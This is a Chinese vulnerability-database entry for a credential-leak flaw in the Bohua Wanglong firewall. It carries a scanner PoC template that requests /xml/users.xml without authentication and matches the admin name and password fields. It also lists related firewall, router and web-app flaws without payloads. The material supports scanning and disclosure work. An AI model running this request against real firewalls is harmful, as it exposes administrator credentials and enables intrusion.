bohuawanglong-users-xml-password-leak: 博华网龙防火墙 users.xml 未授权访问

漏洞描述

PoC代码[已公开]

id: bohuawanglong-users-xml-password-leak

info:
  name: 博华网龙防火墙 users.xml 未授权访问
  author: zan8in
  severity: high
  verified: true
  description: |
    博华网龙防火墙 users.xml文件 可被任意用户读取，其中包含登录的账号密码
    "博华网龙防火墙"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99%E9%98%B2%E7%81%AB%E5%A2%99%20users.xml%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html

rules:
  r0:
    request:
      method: GET
      path: /xml/users.xml
    expression: response.status == 200 && response.body.bcontains(b'name="admin"') && response.body.bcontains(b'pwd="')
expression: r0()

相关漏洞推荐

• bohuangwanglong-cmd-php-rce: 博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM) POC

  2025-09-01 | 博华网龙防火墙
  博华网龙防火墙 cmd.php 过滤不足，导致命令拼接执行远程命令 "博华网龙防火墙"

• 博华网龙防火墙系统 /firewall/arp_scan.php 命令执行漏洞 无POC

  2025-03-21 | 博华网龙防火墙系统
  博华网龙防火墙 NetLoong 系列产品是博华科技集十年网络安全行业经验与中科院计算所联合研制的新一代基于并行分流硬件处理技术的安全网关设备。博华网龙防火墙系统存在arp_scan 命令执行漏洞，攻...

• 博华网龙防火墙一体机systemtools/cmd.php页面SRC参数-远程命令执行漏洞 无POC

  2022-02-10 | 博华网龙防火墙
  博华网龙防火墙一体机systemtools/cmd.php页面存在远程命令执行漏洞。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...